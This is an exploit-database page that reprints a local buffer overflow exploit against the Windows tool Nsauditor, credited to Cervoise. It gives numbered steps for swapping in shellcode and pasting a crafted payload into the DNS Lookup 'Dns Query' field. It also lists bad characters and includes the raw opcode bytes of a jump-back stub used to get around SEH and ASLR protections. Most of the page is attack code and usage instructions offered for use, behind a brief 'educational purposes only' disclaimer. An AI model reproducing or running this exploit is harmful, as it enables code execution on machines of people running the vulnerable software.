Exploits / Vulnerability Discovered : 2020-04-20 |
Type : local |
Platform : windows
This exploit / vulnerability Nsauditor buffer overflow (seh+aslr bypass (3 bytes overwrite)) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Nsauditor - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN
# Exploit originally found on Nsauditor by ACHILLES
# Latest version Nsauditor (4/13/2020 1:51:53) is still
# 1 -> Change the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select "Tools" -> "Dns Lookup"
# 5 -> Paste the content into the Field: "Dns Query'"
# 6 -> Click "Resolve"
# Badchars ->
# Maybe less badchars between \x80 and \x9f but I was lazy (I just
checked thoose I needed)
# An address near the end of our buffer is on the stack, only three pop
are needed to get it
# Then we just have to moving at the begging of our buffer
# An egghunter does the job, but will not be compatible with all Windows
going_back = b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\xFF\xE0" #JMP EAX